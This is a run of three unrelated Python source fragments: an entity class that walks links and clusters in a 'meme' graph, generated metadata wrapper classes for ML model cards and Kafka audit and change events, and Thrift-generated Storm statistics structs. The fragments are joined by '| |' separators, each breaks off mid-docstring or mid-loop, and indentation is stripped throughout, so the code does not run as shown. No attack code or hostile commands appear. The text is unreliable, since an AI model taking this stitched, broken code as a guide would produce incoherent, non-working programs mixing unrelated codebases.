parentMeme = templateRepository.resolveTemplateAbsolutely(self.memePath.fullTemplatePath)
isSingleton = parentMeme.isSingleton
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return isSingleton
def getLinkIDs(self):
""" Get all of the UUIDs for all links involving this entity"""
#method = moduleName + '.' + self.className + '.getLinkIDs'
filteredLinkList = []
try:
sourceID = self.uuid
filteredLinkList = linkRepository.getAllLinks(sourceID)
#filteredLinkTuples= linkRepository.getAllLinks(sourceID)
#for filteredLinkTuple in filteredLinkTuples:
# filteredLinkList.append(filteredLinkTuple[0])
except Exception as e:
unusedDummy = e #dummy variable declaration to prevent false alarm pydev warnings when debug statement is commented out
#logQ.put( [logType , logLevel.DEBUG , method , "Failure getting link IDs. Traceback = %s" %e])
pass
return filteredLinkList
def getLinkedEntitiesByMemeType(self, memePath, splitMetaMemePath = None, linkType = 0):
""" Find the member entities at the end of the Member Path.
May be called with a composite path (e.g. Inventory.Inventory::Loot.GoldCoin) in meme
or may be called with an explicitly regression split member path (which is a list)
examples:
entities = self.getMemberEntitiesByType('Inventory.Inventory::Loot.GoldCoin')
entities = self.getMemberEntitiesByType(None, ['Inventory.Inventory', 'Loot.GoldCoin'])
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
returnMembers = self.getLinkedEntitiesByTemplateType(memePath, True, linkType, False, [], True, None)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return returnMembers
def getLinkedEntitiesByMetaMemeType(self, metaMemePath, linkType = 0, returnUniqueValuesOnly = True):
""" Find the member entities at the end of the Member Path.
May be called with a composite path (e.g. Inventory.Inventory::Loot.GoldCoin) in meme
or may be called with an explicitly regression split member path (which is a list)
examples:
entities = self.getMemberEntitiesByType('Inventory.Inventory::Loot.GoldCoin')
entities = self.getMemberEntitiesByType(None, ['Inventory.Inventory', 'Loot.GoldCoin'])
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByMetaMemeType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
returnMembers = self.getLinkedEntitiesByTemplateType(metaMemePath, False, linkType, False, [], returnUniqueValuesOnly, None)
#logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
return returnMembers
def buildClusterMemberMetadata(self, rawCluster):
"""
This is a method for refining the raw entity member data into metadata
"""
clusterMetadata = {}
for rawClusterEntry in rawCluster:
dictKey = getUUIDAsString(rawClusterEntry[1])
clusterMetadata[dictKey] = [rawClusterEntry[2], rawClusterEntry[3]]
return clusterMetadata
def getClusterMembers(self, linkType= 0, crossSingletons = False, excludeLinks = []):
"""
This method wraps getEntityCluster and then returns only the UUIDs of the members of the cluster
"""
#method = moduleName + '.' + self.className + '.getLinkedEntitiesByTemplateType'
#logQ.put( [logType , logLevel.DEBUG , method , "entering"])
entireCluster = self.getEntityCluster(linkType, crossSingletons, excludeLinks)
clusterMetaData = self.buildClusterMemberMetadata(entireCluster)
#buildClusterMemberMetadata returns the UUIDs as strings, because UUIDs can't be used for indexing dicts.
# This method returns UUID objects however
returnMembersStrings = clusterMetaData.keys()
returnMembers = []
for returnMembersString in returnMembersStrings:
idAsUUID = uuid.UUID(returnMembersString)
returnMembers.append(idAsUUID)
return returnMembers
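# A minimal usage sketch for getClusterMembers, assuming `entity` is an
# already created instance of this class; the argument values are
# illustrative only:
# memberIDs = entity.getClusterMembers(linkType=0, crossSingletons=False)
# for memberID in memberIDs: # each entry is a uuid.UUID object
# print(memberID)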
def getEntityCluster(self, linkType = 0, crossSingletons = False, excludeLinks = []):
""" This is a method is | |
return self._inner_dict.get('version') # type: ignore
@version.setter
def version(self, value: Union[None, "VersionTagClass"]) -> None:
"""Setter: Version of the MLPrimaryKey"""
self._inner_dict['version'] = value
@property
def sources(self) -> List[str]:
"""Getter: Source of the MLPrimaryKey"""
return self._inner_dict.get('sources') # type: ignore
@sources.setter
def sources(self, value: List[str]) -> None:
"""Setter: Source of the MLPrimaryKey"""
self._inner_dict['sources'] = value
class MetricsClass(DictWrapper):
"""Metrics to be featured for the MLModel."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.Metrics")
def __init__(self,
performanceMeasures: Union[None, List[str]]=None,
decisionThreshold: Union[None, List[str]]=None,
):
super().__init__()
self.performanceMeasures = performanceMeasures
self.decisionThreshold = decisionThreshold
@classmethod
def construct_with_defaults(cls) -> "MetricsClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.performanceMeasures = self.RECORD_SCHEMA.field_map["performanceMeasures"].default
self.decisionThreshold = self.RECORD_SCHEMA.field_map["decisionThreshold"].default
@property
def performanceMeasures(self) -> Union[None, List[str]]:
"""Getter: Measures of MLModel performance"""
return self._inner_dict.get('performanceMeasures') # type: ignore
@performanceMeasures.setter
def performanceMeasures(self, value: Union[None, List[str]]) -> None:
"""Setter: Measures of MLModel performance"""
self._inner_dict['performanceMeasures'] = value
@property
def decisionThreshold(self) -> Union[None, List[str]]:
"""Getter: Decision Thresholds used (if any)?"""
return self._inner_dict.get('decisionThreshold') # type: ignore
@decisionThreshold.setter
def decisionThreshold(self, value: Union[None, List[str]]) -> None:
"""Setter: Decision Thresholds used (if any)?"""
self._inner_dict['decisionThreshold'] = value
class QuantitativeAnalysesClass(DictWrapper):
"""Quantitative analyses should be disaggregated, that is, broken down by the chosen factors. Quantitative analyses should provide the results of evaluating the MLModel according to the chosen metrics, providing confidence interval values when possible."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses")
def __init__(self,
unitaryResults: Union[None, str]=None,
intersectionalResults: Union[None, str]=None,
):
super().__init__()
self.unitaryResults = unitaryResults
self.intersectionalResults = intersectionalResults
@classmethod
def construct_with_defaults(cls) -> "QuantitativeAnalysesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.unitaryResults = self.RECORD_SCHEMA.field_map["unitaryResults"].default
self.intersectionalResults = self.RECORD_SCHEMA.field_map["intersectionalResults"].default
@property
def unitaryResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
return self._inner_dict.get('unitaryResults') # type: ignore
@unitaryResults.setter
def unitaryResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to each factor"""
self._inner_dict['unitaryResults'] = value
@property
def intersectionalResults(self) -> Union[None, str]:
"""Getter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
return self._inner_dict.get('intersectionalResults') # type: ignore
@intersectionalResults.setter
def intersectionalResults(self, value: Union[None, str]) -> None:
"""Setter: Link to a dashboard with results showing how the MLModel performed with respect to the intersection of evaluated factors?"""
self._inner_dict['intersectionalResults'] = value
class SourceCodeClass(DictWrapper):
"""Source Code"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCode")
def __init__(self,
sourceCode: List["SourceCodeUrlClass"],
):
super().__init__()
self.sourceCode = sourceCode
@classmethod
def construct_with_defaults(cls) -> "SourceCodeClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.sourceCode = list()
@property
def sourceCode(self) -> List["SourceCodeUrlClass"]:
"""Getter: Source Code along with types"""
return self._inner_dict.get('sourceCode') # type: ignore
@sourceCode.setter
def sourceCode(self, value: List["SourceCodeUrlClass"]) -> None:
"""Setter: Source Code along with types"""
self._inner_dict['sourceCode'] = value
class SourceCodeUrlClass(DictWrapper):
"""Source Code Url Entity"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl")
def __init__(self,
type: Union[str, "SourceCodeUrlTypeClass"],
sourceCodeUrl: str,
):
super().__init__()
self.type = type
self.sourceCodeUrl = sourceCodeUrl
@classmethod
def construct_with_defaults(cls) -> "SourceCodeUrlClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = SourceCodeUrlTypeClass.ML_MODEL_SOURCE_CODE
self.sourceCodeUrl = str()
@property
def type(self) -> Union[str, "SourceCodeUrlTypeClass"]:
"""Getter: Source Code Url Types"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "SourceCodeUrlTypeClass"]) -> None:
"""Setter: Source Code Url Types"""
self._inner_dict['type'] = value
@property
def sourceCodeUrl(self) -> str:
"""Getter: Source Code Url"""
return self._inner_dict.get('sourceCodeUrl') # type: ignore
@sourceCodeUrl.setter
def sourceCodeUrl(self, value: str) -> None:
"""Setter: Source Code Url"""
self._inner_dict['sourceCodeUrl'] = value
class SourceCodeUrlTypeClass(object):
# No docs available.
ML_MODEL_SOURCE_CODE = "ML_MODEL_SOURCE_CODE"
TRAINING_PIPELINE_SOURCE_CODE = "TRAINING_PIPELINE_SOURCE_CODE"
EVALUATION_PIPELINE_SOURCE_CODE = "EVALUATION_PIPELINE_SOURCE_CODE"
class TrainingDataClass(DictWrapper):
"""Ideally, the MLModel card would contain as much information about the training data as the evaluation data. However, there might be cases where it is not feasible to provide this level of detailed information about the training data. For example, the data may be proprietary, or require a non-disclosure agreement. In these cases, we advocate for basic details about the distributions over groups in the data, as well as any other details that could inform stakeholders on the kinds of biases the model may have encoded."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.ml.metadata.TrainingData")
def __init__(self,
trainingData: List["BaseDataClass"],
):
super().__init__()
self.trainingData = trainingData
@classmethod
def construct_with_defaults(cls) -> "TrainingDataClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.trainingData = list()
@property
def trainingData(self) -> List["BaseDataClass"]:
"""Getter: Details on the dataset(s) used for training the MLModel"""
return self._inner_dict.get('trainingData') # type: ignore
@trainingData.setter
def trainingData(self, value: List["BaseDataClass"]) -> None:
"""Setter: Details on the dataset(s) used for training the MLModel"""
self._inner_dict['trainingData'] = value
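# These generated DictWrapper classes are thin views over an underlying dict.
# A minimal construction sketch (the field values are illustrative only):
# td = TrainingDataClass.construct_with_defaults()
# td.trainingData = [] # or a list of BaseDataClass instances
# url = SourceCodeUrlClass(type=SourceCodeUrlTypeClass.ML_MODEL_SOURCE_CODE,
# sourceCodeUrl="https://example.com/repo") # placeholder URL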
class MetadataAuditEventClass(DictWrapper):
"""Kafka event for capturing update made to an entity's metadata."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataAuditEvent")
def __init__(self,
newSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
oldSnapshot: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]=None,
):
super().__init__()
self.auditHeader = auditHeader
self.oldSnapshot = oldSnapshot
self.newSnapshot = newSnapshot
@classmethod
def construct_with_defaults(cls) -> "MetadataAuditEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.oldSnapshot = self.RECORD_SCHEMA.field_map["oldSnapshot"].default
self.newSnapshot = ChartSnapshotClass.construct_with_defaults()
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def oldSnapshot(self) -> Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('oldSnapshot') # type: ignore
@oldSnapshot.setter
def oldSnapshot(self, value: Union[None, "ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata before the update. Set to null for newly created metadata. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['oldSnapshot'] = value
@property
def newSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
return self._inner_dict.get('newSnapshot') # type: ignore
@newSnapshot.setter
def newSnapshot(self, value: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]) -> None:
"""Setter: Snapshot of the metadata after the update. Only the metadata aspects affected by the update are included in the snapshot."""
self._inner_dict['newSnapshot'] = value
class MetadataChangeEventClass(DictWrapper):
"""Kafka event for proposing a metadata change for an entity. A corresponding MetadataAuditEvent is emitted when the change is accepted and committed, otherwise a FailedMetadataChangeEvent will be emitted instead."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.mxe.MetadataChangeEvent")
def __init__(self,
proposedSnapshot: Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"],
auditHeader: Union[None, "KafkaAuditHeaderClass"]=None,
proposedDelta: None=None,
):
super().__init__()
self.auditHeader = auditHeader
self.proposedSnapshot = proposedSnapshot
self.proposedDelta = proposedDelta
@classmethod
def construct_with_defaults(cls) -> "MetadataChangeEventClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditHeader = self.RECORD_SCHEMA.field_map["auditHeader"].default
self.proposedSnapshot = ChartSnapshotClass.construct_with_defaults()
self.proposedDelta = self.RECORD_SCHEMA.field_map["proposedDelta"].default
@property
def auditHeader(self) -> Union[None, "KafkaAuditHeaderClass"]:
"""Getter: Kafka audit header. See go/kafkaauditheader for more info."""
return self._inner_dict.get('auditHeader') # type: ignore
@auditHeader.setter
def auditHeader(self, value: Union[None, "KafkaAuditHeaderClass"]) -> None:
"""Setter: Kafka audit header. See go/kafkaauditheader for more info."""
self._inner_dict['auditHeader'] = value
@property
def proposedSnapshot(self) -> Union["ChartSnapshotClass", "CorpGroupSnapshotClass", "CorpUserSnapshotClass", "DashboardSnapshotClass", "DataFlowSnapshotClass", "DataJobSnapshotClass", "DatasetSnapshotClass", "DataProcessSnapshotClass", "DataPlatformSnapshotClass", "MLModelSnapshotClass", "MLPrimaryKeySnapshotClass", "MLFeatureSnapshotClass", "MLFeatureTableSnapshotClass", "TagSnapshotClass", "GlossaryTermSnapshotClass", "GlossaryNodeSnapshotClass"]:
"""Getter: Snapshot of the proposed metadata change. Include | |
if ftype == TType.DOUBLE:
self.complete_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('SpoutAggregateStats')
if self.complete_latency_ms is not None:
oprot.writeFieldBegin('complete_latency_ms', TType.DOUBLE, 1)
oprot.writeDouble(self.complete_latency_ms)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.complete_latency_ms)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
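# Each generated struct follows the same Thrift pattern: read()/write()
# (de)serialize against thrift_spec, optionally through the fastbinary C
# extension. A minimal round-trip sketch, assuming the standard thrift
# Python runtime is available:
# from thrift.transport import TTransport
# from thrift.protocol import TBinaryProtocol
# buf = TTransport.TMemoryBuffer()
# SpoutAggregateStats(complete_latency_ms=12.5).write(TBinaryProtocol.TBinaryProtocol(buf))
# stats = SpoutAggregateStats()
# stats.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))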
class BoltAggregateStats:
"""
Attributes:
- execute_latency_ms
- process_latency_ms
- executed
- capacity
"""
thrift_spec = (
None, # 0
(1, TType.DOUBLE, 'execute_latency_ms', None, None, ), # 1
(2, TType.DOUBLE, 'process_latency_ms', None, None, ), # 2
(3, TType.I64, 'executed', None, None, ), # 3
(4, TType.DOUBLE, 'capacity', None, None, ), # 4
)
def __init__(self, execute_latency_ms=None, process_latency_ms=None, executed=None, capacity=None,):
self.execute_latency_ms = execute_latency_ms
self.process_latency_ms = process_latency_ms
self.executed = executed
self.capacity = capacity
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.DOUBLE:
self.execute_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.DOUBLE:
self.process_latency_ms = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.executed = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.capacity = iprot.readDouble()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('BoltAggregateStats')
if self.execute_latency_ms is not None:
oprot.writeFieldBegin('execute_latency_ms', TType.DOUBLE, 1)
oprot.writeDouble(self.execute_latency_ms)
oprot.writeFieldEnd()
if self.process_latency_ms is not None:
oprot.writeFieldBegin('process_latency_ms', TType.DOUBLE, 2)
oprot.writeDouble(self.process_latency_ms)
oprot.writeFieldEnd()
if self.executed is not None:
oprot.writeFieldBegin('executed', TType.I64, 3)
oprot.writeI64(self.executed)
oprot.writeFieldEnd()
if self.capacity is not None:
oprot.writeFieldBegin('capacity', TType.DOUBLE, 4)
oprot.writeDouble(self.capacity)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.execute_latency_ms)
value = (value * 31) ^ hash(self.process_latency_ms)
value = (value * 31) ^ hash(self.executed)
value = (value * 31) ^ hash(self.capacity)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class SpecificAggregateStats:
"""
Attributes:
- bolt
- spout
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'bolt', (BoltAggregateStats, BoltAggregateStats.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'spout', (SpoutAggregateStats, SpoutAggregateStats.thrift_spec), None, ), # 2
)
def __init__(self, bolt=None, spout=None,):
self.bolt = bolt
self.spout = spout
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.bolt = BoltAggregateStats()
self.bolt.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.spout = SpoutAggregateStats()
self.spout.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('SpecificAggregateStats')
if self.bolt is not None:
oprot.writeFieldBegin('bolt', TType.STRUCT, 1)
self.bolt.write(oprot)
oprot.writeFieldEnd()
if self.spout is not None:
oprot.writeFieldBegin('spout', TType.STRUCT, 2)
self.spout.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.bolt)
value = (value * 31) ^ hash(self.spout)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ComponentAggregateStats:
"""
Attributes:
- type
- common_stats
- specific_stats
- last_error
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'type', None, None, ), # 1
(2, TType.STRUCT, 'common_stats', (CommonAggregateStats, CommonAggregateStats.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'specific_stats', (SpecificAggregateStats, SpecificAggregateStats.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'last_error', (ErrorInfo, ErrorInfo.thrift_spec), None, ), # 4
)
def __init__(self, type=None, common_stats=None, specific_stats=None, last_error=None,):
self.type = type
self.common_stats = common_stats
self.specific_stats = specific_stats
self.last_error = last_error
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.type = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.common_stats = CommonAggregateStats()
self.common_stats.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.specific_stats = SpecificAggregateStats()
self.specific_stats.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.last_error = ErrorInfo()
self.last_error.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ComponentAggregateStats')
if self.type is not None:
oprot.writeFieldBegin('type', TType.I32, 1)
oprot.writeI32(self.type)
oprot.writeFieldEnd()
if self.common_stats is not None:
oprot.writeFieldBegin('common_stats', TType.STRUCT, 2)
self.common_stats.write(oprot)
oprot.writeFieldEnd()
if self.specific_stats is not None:
oprot.writeFieldBegin('specific_stats', TType.STRUCT, 3)
self.specific_stats.write(oprot)
oprot.writeFieldEnd()
if self.last_error is not None:
oprot.writeFieldBegin('last_error', TType.STRUCT, 4)
self.last_error.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.type)
value = (value * 31) ^ hash(self.common_stats)
value = (value * 31) ^ hash(self.specific_stats)
value = (value * 31) ^ hash(self.last_error)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TopologyStats:
"""
Attributes:
- window_to_emitted
- window_to_transferred
- window_to_complete_latencies_ms
- window_to_acked
- window_to_failed
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'window_to_emitted', (TType.STRING,None,TType.I64,None), None, ), # 1
(2, TType.MAP, 'window_to_transferred', (TType.STRING,None,TType.I64,None), None, ), # 2
(3, TType.MAP, 'window_to_complete_latencies_ms', (TType.STRING,None,TType.DOUBLE,None), None, ), # 3
(4, TType.MAP, 'window_to_acked', (TType.STRING,None,TType.I64,None), None, ), # 4
(5, TType.MAP, 'window_to_failed', (TType.STRING,None,TType.I64,None), None, ), # 5
)
def __init__(self, window_to_emitted=None, window_to_transferred=None, window_to_complete_latencies_ms=None, window_to_acked=None, window_to_failed=None,):
self.window_to_emitted = window_to_emitted
self.window_to_transferred = window_to_transferred
self.window_to_complete_latencies_ms = window_to_complete_latencies_ms
self.window_to_acked = window_to_acked
self.window_to_failed = window_to_failed
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.window_to_emitted = {}
(_ktype316, _vtype317, _size315 ) = iprot.readMapBegin()
for _i319 in xrange(_size315):
_key320 = iprot.readString().decode('utf-8')
_val321 = iprot.readI64()
self.window_to_emitted[_key320] = _val321
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.MAP:
self.window_to_transferred = {}
(_ktype323, _vtype324, _size322 ) = iprot.readMapBegin()
for _i326 in xrange(_size322):
_key327 = iprot.readString().decode('utf-8')
_val328 = iprot.readI64()
self.window_to_transferred[_key327] = _val328
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.MAP:
self.window_to_complete_latencies_ms = {}
(_ktype330, _vtype331, _size329 ) = iprot.readMapBegin()
for _i333 in xrange(_size329):
_key334 = iprot.readString().decode('utf-8')
_val335 = iprot.readDouble()
self.window_to_complete_latencies_ms[_key334] = _val335
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.window_to_acked = {}
(_ktype337, _vtype338, _size336 ) = iprot.readMapBegin()
for _i340 in xrange(_size336):
_key341 = iprot.readString().decode('utf-8')
_val342 = iprot.readI64()
self.window_to_acked[_key341] = _val342
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.MAP:
self.window_to_failed = {}
(_ktype344, _vtype345, _size343 ) = iprot.readMapBegin()
for _i347 in xrange(_size343):
_key348 = iprot.readString().decode('utf-8')
_val349 = iprot.readI64()
self.window_to_failed[_key348] = _val349
